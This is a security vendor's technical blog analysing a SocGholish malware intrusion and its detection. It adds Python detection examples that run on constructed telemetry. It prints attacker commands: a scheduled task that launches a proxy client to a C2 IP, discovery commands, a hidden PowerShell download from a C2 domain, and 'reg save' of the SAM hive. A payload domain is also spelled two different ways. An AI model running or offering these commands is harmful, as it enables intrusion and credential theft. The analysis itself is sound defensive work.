SenseOn MDR vs. SocGholish: A Technical Analysis

This blog was written by Matthew O’Neil, SenseOn Security Analyst.

In February 2024, SenseOn was contacted to assist with investigating suspicious activity on a customer’s estate. SenseOn analysts quickly confirmed a malware infection and identified the variant as SocGholish. This blog showcases SenseOn’s detection and response capabilities against the malware and breaks down the techniques of both SocGholish itself and the threat actor observed operating it.

Background

Over Q1 2024, the threat landscape saw an uptick in activity involving the SocGholish malware variant. This trend was documented by numerous vendors and organisations, including the analysis below from CIS (Center for Internet Security)[1].

 

Figure 1: CIS Q1 Malware Trends

 

The variant has been attributed by Proofpoint[2] to the threat actor tracked as TA569, also known as Mustard Tempest, based on victim profiles and procedures observed across intrusions. The group has also been tied to ransomware operators, with variants such as Hive and LockBit deployed following SocGholish infections. Mustard Tempest is believed to be financially motivated and is known to use SocGholish to provide Initial-Access-as-a-Service (IAaaS) to paying customers. The malware also has ties to Evil Corp[3]; however, given the procedures observed during this intrusion, it is more likely that this instance was run by an unknown operator.

Attack Chain

Initial Access & Execution

This infection followed the traditional SocGholish delivery method: drive-by compromise in the form of a fake Google Chrome update[4]. Network traffic analysis using SenseOn telemetry from before the infection shows the victim visiting the malicious site ‘pluralism.themancav[.]com’, after which the SocGholish JavaScript loader ‘Update.js’ is downloaded and executed from the user’s Downloads folder.

This subdomain was last seen active on May 14th and was not active at the time of writing. The website appears to be a half-finished WordPress site, possibly compromised and used as part of the SocGholish distribution network.

Figure 2: Malicious WP Site

Because obfuscated JavaScript loaders are a known and common way to begin a malicious execution chain, execution of the script triggered a SenseOn observation and raised a high-priority case.

Unfortunately, this customer did not have SenseOn’s MDR service at the time of this incident. Therefore, SenseOn did not become involved until after being contacted by the organisation. 

 

Figure 3: JS Observation

 

Once executed, the script beaconed periodically to the C2 domain ‘hjpg.members.openarmscv[.]com’, making a total of 21 HTTPS connections to retrieve additional payloads and notify the attacker of the successful infection. Approximately 8 hours and 24 minutes after ‘Update.js’ was executed, SenseOn detected malicious discovery activity; the delay may have been intended to evade detection.
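As an added illustration (not part of SenseOn’s analysis or tooling), the Python below shows how the regularity of a run of connections like those 21 can be tested from proxy or flow timestamps: a low coefficient of variation of the inter-connection intervals is the classic beaconing signal, and the gap between the first beacon and the first discovery command gives the time the operator waited before going hands-on. The timestamps, the 24-minute interval and the jitter are constructed for the example; the real cadence was not published.

```python
"""Beacon-regularity check over connection timestamps (added example, constructed data)."""
from datetime import datetime, timedelta
from statistics import mean, pstdev

C2_HOST = "hjpg.members.openarmscv[.]com"

# Constructed sample: 21 HTTPS connections from the beachhead to the loader's C2
# host, about 24 minutes apart with a few seconds of jitter. The interval and
# jitter are assumptions for the example; the post only gives the connection count.
_START = datetime(2024, 2, 12, 9, 0, 0)
_JITTER_SECONDS = [11, -7, 4, 9, -12, 3, 0, 6, -5, 8, -9, 2, 10, -3, 5, -8, 7, -2, 1, 0]
SAMPLE_CONNECTIONS = [(_START, C2_HOST)]
for _j in _JITTER_SECONDS:
    _prev = SAMPLE_CONNECTIONS[-1][0]
    SAMPLE_CONNECTIONS.append((_prev + timedelta(minutes=24, seconds=_j), C2_HOST))

# Constructed: a burst of human browsing to one site (uneven gaps), for contrast.
_BROWSE_GAPS = [3, 240, 17, 1800, 5, 60, 3600, 2, 900, 45, 20, 7200]
SAMPLE_BROWSING = [_START]
for _g in _BROWSE_GAPS:
    SAMPLE_BROWSING.append(SAMPLE_BROWSING[-1] + timedelta(seconds=_g))

# The first discovery command followed roughly 8h24m after Update.js ran.
FIRST_DISCOVERY = _START + timedelta(hours=8, minutes=24)


def timestamps_for(connections, host):
    """Sorted connection times to one destination host."""
    return sorted(ts for ts, dst in connections if dst == host)


def beacon_stats(timestamps):
    """Return (connection_count, mean_interval_s, cv).

    cv is the coefficient of variation (stdev / mean) of the inter-arrival
    times. Timer-driven beacons, even with jitter, sit well below 0.2; human
    traffic to the same host is usually far above it.
    """
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return (len(ts), None, None)
    avg = mean(gaps)
    return (len(ts), avg, pstdev(gaps) / avg if avg else None)


def is_beaconing(timestamps, min_connections=10, max_cv=0.2):
    """True when there are enough connections and their spacing is regular."""
    count, _, cv = beacon_stats(timestamps)
    return count >= min_connections and cv is not None and cv <= max_cv


def dwell_before_hands_on(timestamps, first_discovery):
    """Time from the first beacon to the first interactive/discovery activity."""
    return first_discovery - min(timestamps)


if __name__ == "__main__":
    c2 = timestamps_for(SAMPLE_CONNECTIONS, C2_HOST)
    count, avg, cv = beacon_stats(c2)
    print(f"{C2_HOST}: {count} connections, mean gap {avg / 60:.1f} min, "
          f"cv {cv:.3f}, beaconing={is_beaconing(c2)}")
    print("wait before discovery:", dwell_before_hands_on(c2, FIRST_DISCOVERY))
    print("browsing sample beaconing:", is_beaconing(SAMPLE_BROWSING))
```

The threshold of 0.2 is a starting point, not a constant of nature: loaders with large randomised sleeps push the cv up, so in production this check is paired with a destination-rarity score rather than used alone.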

Discovery

Throughout the intrusion, SenseOn observed the execution of numerous Windows-native discovery commands to retrieve and store information about the victim’s device, account and network. The attacker was also seen gathering data from Chrome and Edge, as well as executing the commonly seen commands below.

  • net group "domain users" /domain

  • net user [username] /domain

  • systeminfo

  • ipconfig /all

  • cmdley /list

The last command listed, ‘cmdley /list’, is a typo of the intended command ‘cmdkey /list’, which lists stored credentials. This may indicate a typo in a discovery script, or it may suggest that the discovery was hands-on-keyboard rather than automated. Either way, a number of these commands were detected by SenseOn, shown below alongside the ‘cmdley’ command from telemetry.

Figures 4, 5 and 6: Discovery

 

The output of these commands was redirected into ‘.tmp’ files stored at ‘C:\Users\[USER]\AppData\Local\Temp\’, such as ‘rad29332.tmp’. These discovery techniques align with previous analyses of SocGholish samples from 2022 reported by Trend Micro[5]; that earlier analysis leans more towards the discovery being automated.
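As an added example (not SenseOn’s detection logic, and not code from the original post), the Python below runs a discovery-burst rule over a handful of constructed process-creation events shaped like this phase of the intrusion: several distinct Windows-native enumeration commands on one host inside a short window, with output redirected into Temp\rad<hex>.tmp files. It also resolves single-character typos such as ‘cmdley’ back to ‘cmdkey’ with an edit-distance check, so the operator’s mistake is attributed to the right tool rather than silently dropped. Host names, the user and the exact .tmp names are sample values.

```python
"""Discovery-burst detector over process-creation telemetry (added example, constructed data)."""
import re
from datetime import datetime, timedelta

# Discovery tools seen in the intrusion. "net" is qualified by its subcommand below.
DISCOVERY_IMAGES = {"net", "systeminfo", "ipconfig", "cmdkey", "nltest", "quser"}
# Output redirected into a Temp\rad<5 hex>.tmp file, the naming used throughout the intrusion.
RAD_TMP_REDIRECT = re.compile(r'>\s*"?([^\s"]*\\Temp\\rad[0-9A-F]{5}\.tmp)"?', re.I)
# A command run through "cmd.exe /c ..." is logged as the cmd.exe process; strip the wrapper.
CMD_WRAPPER = re.compile(r'^"?[^"\s]*cmd(?:\.exe)?"?\s+/[ck]\s+', re.I)


def levenshtein(a, b):
    """Edit distance; used so that 'cmdley' still resolves to 'cmdkey'."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def resolve_image(token):
    """Map the first command token to a discovery tool name.

    Returns (name, was_typo). Exact names always match; a single-character typo
    is accepted only for names of five or more characters, so 'set' does not
    turn into 'net'.
    """
    name = token.strip('"').rsplit("\\", 1)[-1].lower()
    if name.endswith(".exe"):
        name = name[:-4]
    if name in DISCOVERY_IMAGES:
        return name, False
    for cand in DISCOVERY_IMAGES:
        if len(cand) >= 5 and levenshtein(name, cand) == 1:
            return cand, True
    return None, False


def classify(command_line):
    """Return a dict describing a discovery command, or None for anything else."""
    cl = CMD_WRAPPER.sub("", command_line.strip())
    tokens = cl.split()
    if not tokens:
        return None
    image, typo = resolve_image(tokens[0])
    if image is None:
        return None
    label = f"net {tokens[1].lower()}" if image == "net" and len(tokens) > 1 else image
    redirect = RAD_TMP_REDIRECT.search(cl)
    return {
        "command": label,
        "typo": tokens[0].strip('"').lower() if typo else None,
        "tmp_output": redirect.group(1) if redirect else None,
    }


def detect_discovery_bursts(events, window=timedelta(minutes=10), threshold=3):
    """events: iterable of (timestamp, host, command_line).

    Raises one alert per host the first time `threshold` distinct discovery
    commands fall inside `window`. A lone `ipconfig /all` never alerts; five
    different enumeration commands in twenty seconds does.
    """
    hits = {}
    for ts, host, cl in sorted(events):
        c = classify(cl)
        if c:
            hits.setdefault(host, []).append((ts, c))
    alerts = []
    for host, rows in hits.items():
        for i, (start, _) in enumerate(rows):
            in_window = [c for ts, c in rows[i:] if ts - start <= window]
            commands = {c["command"] for c in in_window}
            if len(commands) >= threshold:
                alerts.append({
                    "host": host,
                    "window_start": start,
                    "commands": commands,
                    "typos": {c["typo"]: c["command"] for c in in_window if c["typo"]},
                    "tmp_outputs": [c["tmp_output"] for c in in_window if c["tmp_output"]],
                })
                break
    return alerts


# Constructed process-creation events shaped like the intrusion's discovery phase.
# Host names, the user and the exact rad*.tmp names are sample values.
_T0 = datetime(2024, 2, 12, 17, 24, 0)
_TEMP = r"C:\Users\jdoe\AppData\Local\Temp"
SAMPLE_EVENTS = [
    (_T0, "WS-042", 'cmd.exe /c net group "domain users" /domain > ' + _TEMP + r"\rad29332.tmp"),
    (_T0 + timedelta(seconds=4), "WS-042", "cmd.exe /c net user jdoe /domain > " + _TEMP + r"\radA1B2C.tmp"),
    (_T0 + timedelta(seconds=9), "WS-042", "cmd.exe /c systeminfo > " + _TEMP + r"\rad7F01E.tmp"),
    (_T0 + timedelta(seconds=15), "WS-042", "cmd.exe /c ipconfig /all > " + _TEMP + r"\rad3C9D0.tmp"),
    # The typo: cmdley never starts, but the cmd.exe wrapper still logs the attempt.
    (_T0 + timedelta(seconds=21), "WS-042", "cmd.exe /c cmdley /list > " + _TEMP + r"\rad5E2A7.tmp"),
    (_T0 + timedelta(minutes=2), "WS-042", r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer'),
    (_T0 + timedelta(hours=1), "WS-017", "ipconfig /all"),
]

if __name__ == "__main__":
    for alert in detect_discovery_bursts(SAMPLE_EVENTS):
        print(alert)
```

The rad*.tmp redirection is the higher-fidelity half of this rule: administrators run `ipconfig /all` all day, but very few of them pipe it into a five-hex-digit .tmp file in their own Temp directory.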

Payload Retrieval (Ingress Tool Transfer)

Following the initial discovery, SocGholish retrieved additional payloads from the hosting sites below, primarily using the Invoke-WebRequest PowerShell cmdlet. Downloaded files were stored and named in the same way as the discovery output (e.g. ‘rad2BA74.tmp’).

  • hjpg.members.openarmscv[.]com

  • mello-roos[.]com

  • sallassutherland[.]com

Following the connection to the first domain, ‘hjpg.members.openarmscv[.]com’, a downloaded file named ‘radD810D.tmp’ was renamed to ‘da207292.js’ and executed. This execution in turn generated connections to the latter two domains listed above to retrieve further files. Masquerading file types behind the ‘.tmp’ extension was used heavily throughout the intrusion.

 

Figure 7: JavaScript Observation
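As an added example (not code from the post or from SenseOn), the following Python correlates the three event types that together make up the pattern just described: a PowerShell download into a rad<hex>.tmp file, the rename of that file to a script or executable extension, and a script host running the renamed file within a few minutes. The host, user, Temp path, the download command line and the second host’s file name are constructed; the real location of ‘da207292.js’ was not published.

```python
"""Download -> rename -> execute chain correlation (added example, constructed data)."""
import re
from datetime import datetime, timedelta

RAD_TMP = re.compile(r"\\rad[0-9A-F]{5}\.tmp$", re.I)
# Extensions that turn a .tmp into something a host will run.
EXECUTABLE_EXT = (".js", ".jse", ".vbs", ".wsf", ".hta", ".ps1", ".exe", ".dll", ".bat", ".cmd")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe"}
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "wget ", "curl ", ".downloadfile(", ".downloadstring(")


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def correlate_tmp_masquerade(events, window=timedelta(minutes=5)):
    """events: list of dicts with keys ts, host, type and, depending on type:
         type == "process":     image, cmdline
         type == "file_rename": old_path, new_path
    For each rename of a rad*.tmp file to an executable/script extension, look back
    for the download that wrote the .tmp and forward for the process that ran the
    renamed file. Returns one chain per qualifying rename, graded by stages seen.
    """
    events = sorted(events, key=lambda e: e["ts"])
    chains = []
    for ev in events:
        if ev["type"] != "file_rename":
            continue
        old, new = ev["old_path"], ev["new_path"]
        if not RAD_TMP.search(old) or not new.lower().endswith(EXECUTABLE_EXT):
            continue
        chain = {"host": ev["host"], "renamed_from": old, "renamed_to": new,
                 "download": None, "rename": ev["ts"], "execute": None}
        for other in events:
            if other["type"] != "process" or other["host"] != ev["host"]:
                continue
            cl = other["cmdline"].lower()
            delta = other["ts"] - ev["ts"]
            # Download of the .tmp shortly before the rename.
            if -window <= delta <= timedelta(0) and old.lower() in cl \
                    and any(m in cl for m in DOWNLOAD_MARKERS):
                chain["download"] = other["ts"]
            # Execution of the renamed file shortly after, by a script host or directly.
            if timedelta(0) <= delta <= window and new.lower() in cl \
                    and (_basename(other["image"]) in SCRIPT_HOSTS
                         or _basename(other["image"]) == _basename(new)):
                chain["execute"] = chain["execute"] or other["ts"]
        stages = sum(1 for k in ("download", "rename", "execute") if chain[k] is not None)
        chain["severity"] = {3: "high", 2: "medium"}.get(stages, "low")
        chains.append(chain)
    return chains


# Constructed telemetry shaped like the radD810D.tmp -> da207292.js sequence.
_T0 = datetime(2024, 2, 12, 17, 40, 0)
_TEMP = r"C:\Users\jdoe\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"ts": _T0, "host": "WS-042", "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "Invoke-WebRequest -Uri '
                'https://hjpg.members.openarmscv[.]com/ -OutFile ' + _TEMP + r'\radD810D.tmp"'},
    {"ts": _T0 + timedelta(seconds=30), "host": "WS-042", "type": "file_rename",
     "old_path": _TEMP + r"\radD810D.tmp", "new_path": _TEMP + r"\da207292.js"},
    {"ts": _T0 + timedelta(seconds=45), "host": "WS-042", "type": "process",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "wscript.exe " + _TEMP + r"\da207292.js"},
    # Office-style save: a .tmp renamed to a document. Not a masquerade, must not alert.
    {"ts": _T0 + timedelta(minutes=1), "host": "WS-042", "type": "file_rename",
     "old_path": r"C:\Users\jdoe\Documents\~WRD0001.tmp", "new_path": r"C:\Users\jdoe\Documents\report.docx"},
    # Second host: renamed and executed, but the download was not captured.
    {"ts": _T0 + timedelta(minutes=20), "host": "SRV-FS01", "type": "file_rename",
     "old_path": r"C:\Windows\Temp\rad2BA74.tmp", "new_path": r"C:\Windows\Temp\update.js"},
    {"ts": _T0 + timedelta(minutes=21), "host": "SRV-FS01", "type": "process",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Windows\Temp\update.js"},
]

if __name__ == "__main__":
    for chain in correlate_tmp_masquerade(SAMPLE_EVENTS):
        print(chain["host"], chain["severity"], chain["renamed_to"])
```

Grading on stages rather than on the rename alone keeps the rule quiet on installers and Office, which rename .tmp files constantly but never hand them to wscript.exe.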

 

Connections to these domains were detected as malicious by SenseOn and raised observations, including the one below.

 

Figure 8: C2 Observation

 

Additional software was installed to support discovery and persistence. First, Python 3 was downloaded and installed using wget (in Windows PowerShell, ‘wget’ is an alias of Invoke-WebRequest) so that the Python script used for persistence would run. This wget command was detected, as shown below.

 

Figure 9: Python Installation Observation

 

Shortly after this installation, SenseOn also detected a PowerShell WebClient being used to download a PowerSharpPack script from GitHub. PowerSharpPack is a collection of C# post-exploitation tools packaged for use from PowerShell. It includes tools such as SauronEye for searching for password files, the SharPersist persistence toolkit, and SharpChromium, which retrieves Chromium data such as cookies and saved logins.

 

Figure 10: SharpChromium Observation

 

In the same command, the attacker invokes SharpChromium with the ‘logins’ argument, which returns all saved credentials with non-empty passwords, and writes the output to the file ‘rad90F69.tmp’.

Persistence & C2

Shortly after the installation of Python, SenseOn observed a newer SocGholish persistence method, also documented by ReliaQuest[6]: a scheduled task set to execute a Python script every 5 minutes. Within the task, the arguments passed to the script specify the C2 IP address and port number. The command used to create the task is shown below.

schtasks /create /f /tn "pypi-py" /tr "c:\programdata\py3\pythonw.exe c:\programdata\py3\a-temp.py -ip 92.118.112[.]208 -port 443" /sc minute /mo 5

Based on previous research, the script appears to be a SOCKS5 proxy client used to provide C2 communications.
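To show how a task like the one above can be triaged automatically, here is an added Python example (not part of the post or of SenseOn’s product) that parses a schtasks /create command line and scores it on the traits of this persistence task: a script interpreter as the action, a binary under a user-writable directory such as ProgramData, a minute-level schedule, and a remote address and port passed as arguments. The ‘-ip’/‘-port’ argument names are taken from the command above; the benign comparison task is constructed.

```python
"""Triage of a schtasks /create command line (added example)."""
import re

# Options that take a value; anything else beginning with "/" is a bare flag such as /create or /f.
VALUE_OPTS = {"/tn", "/tr", "/sc", "/mo", "/st", "/sd", "/ru", "/rp", "/rl", "/d", "/m", "/du", "/ri"}
INTERPRETERS = {"python.exe", "pythonw.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "pwsh.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE_DIRS = ("\\programdata\\", "\\users\\", "\\temp\\", "\\appdata\\")
# First token of the task action up to and including its extension, then the arguments.
PROGRAM_RE = re.compile(r"^(.+?\.(?:exe|com|bat|cmd|py|pyw|js|vbs|ps1|dll|hta))(?:\s+(.*))?$", re.I)
# Dotted quads, including the defanged 92.118.112[.]208 form used in reports.
IP_RE = re.compile(r"\b\d{1,3}(?:\[?\.\]?\d{1,3}){3}\b")
# "-ip X -port Y" is the argument convention of the proxy script in this intrusion;
# extend the alternation for other tools.
PORT_RE = re.compile(r"(?:^|\s)-{1,2}(?:port|p)\s+(\d{1,5})\b", re.I)


def split_cmdline(cmdline):
    """Split on whitespace outside double quotes; the quotes themselves are dropped."""
    args, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def parse_schtasks(cmdline):
    """Return (options, flags) from a schtasks command line."""
    args = split_cmdline(cmdline)
    opts, flags, i = {}, set(), 1  # index 0 is the schtasks image itself
    while i < len(args):
        key = args[i].lower()
        if key in VALUE_OPTS and i + 1 < len(args):
            opts[key] = args[i + 1]
            i += 2
        else:
            flags.add(key)
            i += 1
    return opts, flags


def analyse_schtasks(cmdline):
    """Score a task-creation command for the traits of the SocGholish persistence task."""
    opts, flags = parse_schtasks(cmdline)
    task_run = opts.get("/tr", "")
    m = PROGRAM_RE.match(task_run)
    program, arguments = (m.group(1), m.group(2) or "") if m else (task_run.split(" ")[0], "")
    sc = opts.get("/sc", "").lower()
    mo = int(opts["/mo"]) if opts.get("/mo", "").isdigit() else None
    ip = IP_RE.search(arguments)
    port = PORT_RE.search(arguments)

    indicators = []
    if program.rsplit("\\", 1)[-1].lower() in INTERPRETERS:
        indicators.append("script interpreter as task action")
    if any(d in program.lower() for d in USER_WRITABLE_DIRS):
        indicators.append("action binary in a user-writable directory")
    if sc == "minute" and mo is not None and mo <= 10:
        indicators.append(f"runs every {mo} minute(s)")
    if ip and port:
        indicators.append("remote address and port passed as arguments")

    return {
        "task_name": opts.get("/tn"),
        "program": program,
        "arguments": arguments,
        "schedule": (sc, mo),
        "c2_ip": ip.group(0) if ip else None,
        "c2_port": int(port.group(1)) if port else None,
        "force_overwrite": "/f" in flags,
        "indicators": indicators,
        "score": len(indicators),
        "verdict": "suspicious" if len(indicators) >= 3 else "benign",
    }


# The task-creation command observed in the intrusion.
SOCGHOLISH_TASK = (r'schtasks /create /f /tn "pypi-py" /tr "c:\programdata\py3\pythonw.exe '
                   r'c:\programdata\py3\a-temp.py -ip 92.118.112[.]208 -port 443" /sc minute /mo 5')
# Constructed benign task for contrast.
BENIGN_TASK = r'schtasks /create /tn "Disk Cleanup" /tr "C:\Windows\System32\cleanmgr.exe /autoclean" /sc daily /st 03:00'

if __name__ == "__main__":
    for cmd in (SOCGHOLISH_TASK, BENIGN_TASK):
        r = analyse_schtasks(cmd)
        print(r["task_name"], r["verdict"], r["indicators"])
```

The same fields can be read back from the task XML under C:\Windows\System32\Tasks when the creating command line was not captured; the scoring is unchanged.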

Throughout this intrusion, the dropper accessed numerous domains to retrieve additional payloads; however, the primary C2 channel was established between the beachhead device and the server specified in the scheduled task, ‘92.118.112[.]208’. At the time of writing, only 4 VirusTotal vendors flag this IP address as malicious.

Once C2 communication began, SenseOn quickly detected the network traffic using SenseOn’s threat intelligence detections, which assisted in attributing the threat to SocGholish.

 

Figure 11: C2 Threat Intelligence Observation

 

Lateral Movement

Once the proxy client was established, the attacker was observed moving laterally to adjacent servers over RDP and executing similar discovery commands on each server. Here the ping utility was also used to check connectivity back to the beachhead and to the internet.

  • net user [username]

  • net user [username] /domain

  • net group "domain admins" /domain

  • nltest /domain_trusts

  • quser /server:[servername]

  • ping [beachhead]

  • ping google.com

Furthermore, the attacker was observed using the Windows ‘reg.exe’ utility on multiple servers to dump credential material from registry hives; the commands are shown in the endpoint telemetry below.

 

Figure 12: Registry dumping telemetry
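The cross-host picture described in this section can be reconstructed from two telemetry streams, as in this added Python example (constructed data, not SenseOn’s code): Windows 4624 logon events with LogonType 10 (RemoteInteractive, i.e. RDP) whose source is the beachhead, joined to process-creation events on the target within the following hour. The post does not reproduce the reg.exe command lines; the example assumes the standard ‘reg save HKLM\SAM’ / ‘HKLM\SYSTEM’ form used for offline hive extraction, and the host names, IP addresses, account and output paths are sample values.

```python
"""RDP pivot correlation: logon from the beachhead followed by discovery or hive dumping
(added example, constructed data)."""
import re
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10  # Windows 4624 LogonType 10 = RemoteInteractive (RDP)
# reg.exe save/export of the SAM, SECURITY or SYSTEM hive: offline credential extraction.
# The exact form used in the intrusion was not published; this is the textbook pattern.
HIVE_DUMP = re.compile(
    r'\breg(?:\.exe)?\s+(?:save|export)\s+"?(?:hklm|hkey_local_machine)\\(sam|security|system)\b', re.I)
# Discovery tools listed for the lateral-movement phase, with an optional "cmd.exe /c" wrapper.
DISCOVERY = re.compile(
    r'^(?:"?[^"\s]*cmd(?:\.exe)?"?\s+/[ck]\s+)?"?(?:[^"\s]*\\)?'
    r'(net|nltest|quser|systeminfo|ipconfig|ping)(?:\.exe)?\b', re.I)


def rdp_pivot_chains(logons, processes, beachhead_ip, window=timedelta(hours=1)):
    """logons: (ts, target_host, logon_type, source_ip, user) from 4624 events.
    processes: (ts, host, user, cmdline) from process-creation telemetry.
    For every RDP logon whose source is the beachhead, collect what that account ran on
    the target within `window` and grade the pivot by the worst thing seen."""
    chains = []
    for ts, target, logon_type, source, user in sorted(logons):
        if logon_type != RDP_LOGON_TYPE or source != beachhead_ip:
            continue
        chain = {"target": target, "user": user, "logon": ts, "discovery": [], "hive_dumps": []}
        for pts, host, puser, cmdline in processes:
            if host != target or puser != user or not (timedelta(0) <= pts - ts <= window):
                continue
            m = HIVE_DUMP.search(cmdline)
            if m:
                chain["hive_dumps"].append(m.group(1).upper())
            elif DISCOVERY.match(cmdline):
                chain["discovery"].append(cmdline)
        if chain["hive_dumps"]:
            chain["severity"] = "critical"
        elif chain["discovery"]:
            chain["severity"] = "high"
        else:
            chain["severity"] = "info"
        chains.append(chain)
    return chains


# Constructed sample telemetry. Addresses, hosts, account and hive output paths are made up.
_T0 = datetime(2024, 2, 13, 2, 10, 0)
BEACHHEAD_IP = "10.10.20.42"  # assumed address of the initially infected workstation
SAMPLE_LOGONS = [
    (_T0, "SRV-FS01", 10, BEACHHEAD_IP, r"CORP\jdoe"),
    (_T0 + timedelta(minutes=2), "SRV-FS01", 3, BEACHHEAD_IP, r"CORP\jdoe"),   # SMB, not RDP
    (_T0 + timedelta(minutes=30), "SRV-APP02", 10, BEACHHEAD_IP, r"CORP\jdoe"),
    (_T0 + timedelta(minutes=5), "SRV-DB03", 10, "10.10.30.7", r"CORP\dba"),  # RDP from another host
]
SAMPLE_PROCESSES = [
    (_T0 + timedelta(minutes=3), "SRV-FS01", r"CORP\jdoe", "cmd.exe /c nltest /domain_trusts"),
    (_T0 + timedelta(minutes=4), "SRV-FS01", r"CORP\jdoe", "cmd.exe /c ping 10.10.20.42"),
    (_T0 + timedelta(minutes=6), "SRV-FS01", r"CORP\jdoe", r"reg.exe save hklm\sam C:\Windows\Temp\sam.hiv"),
    (_T0 + timedelta(minutes=6, seconds=10), "SRV-FS01", r"CORP\jdoe", r"reg.exe save hklm\system C:\Windows\Temp\sys.hiv"),
    (_T0 + timedelta(minutes=33), "SRV-APP02", r"CORP\jdoe", "cmd.exe /c quser /server:SRV-APP02"),
    (_T0 + timedelta(minutes=8), "SRV-DB03", r"CORP\dba", r"reg.exe query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"),
]

if __name__ == "__main__":
    for chain in rdp_pivot_chains(SAMPLE_LOGONS, SAMPLE_PROCESSES, BEACHHEAD_IP):
        print(chain["target"], chain["severity"], chain["hive_dumps"], len(chain["discovery"]))
```

Keying the join on the beachhead’s address is what turns a set of individually explainable events (an RDP session, an admin running nltest) into a pivot chain; once the first compromised host is known, every RDP session it originates deserves this treatment.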

 

Containment & Eradication

Once SenseOn responded and confirmed the presence of malware through the analysis above, the beachhead device was isolated using SenseOn Active Response. To ensure containment, SenseOn, in collaboration with the client, also isolated several devices that the attacker had accessed. A selection of these devices was then reimaged and the threat was eradicated from the network.

Following containment and eradication, SenseOn’s 24/7 global SOC provided enhanced monitoring for the estate, including case monitoring and threat hunts for malicious activity for a set period after the incident.

Timeline


Conclusion

Once the malware infection was confirmed by the SenseOn SOC, SenseOn used Active Response to assist in containing the threat by isolating numerous devices on the network. This allowed the organisation to eradicate remnants of the threat, recover the servers and reimage the initially compromised device. Through this breakdown, we have detailed SenseOn’s detection capabilities and service response to the SocGholish malware.

SocGholish continues to be a threat to organisations, with new samples found as recently as August 5th, as reported by SquiblydooBlog[7]. That sample is consistent with our analysis, again using obfuscated JavaScript, this time dropped from a poorly maintained religious website, ‘miraclesofeucharisticjesus[.]org’. The site appears to be either compromised or staged for distribution.

Figure 13: Malicious SocGholish site

The scope of attacks such as this one demonstrates the need for businesses to deploy and maintain robust detection and response solutions that give responders both visibility of threats and the ability to act on them.

IoCs

Domains

  • pluralism.themancav[.]com

  • hjpg.members.openarmscv[.]com

  • dallassutherland[.]com

  • mello-roos[.]com 

  • miraclesofeucharisticjesus[.]org

IP Addresses

  • 92.118.112[.]208

References

  1. CIS Blog: https://www.cisecurity.org/insights/blog/top-10-malware-q1-2024

  2. Proofpoint Blog: https://www.proofpoint.com/uk/blog/email-and-cloud-threats/detecting-analyzing-socgholish-attack

  3. TrueSec Blog: https://www.truesec.com/hub/blog/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies

  4. Red Canary Threat Detection Report: https://redcanary.com/threat-detection-report/threats/socgholish/

  5. Trend Micro Research: https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html

  6. ReliaQuest Blog: https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/

  7. Malware Bazaar sample reported by SquiblydooBlog: https://bazaar.abuse.ch/sample/546191fbae56a18d93abc82099ee355532e944fbaec50239c139144af1d42a55/
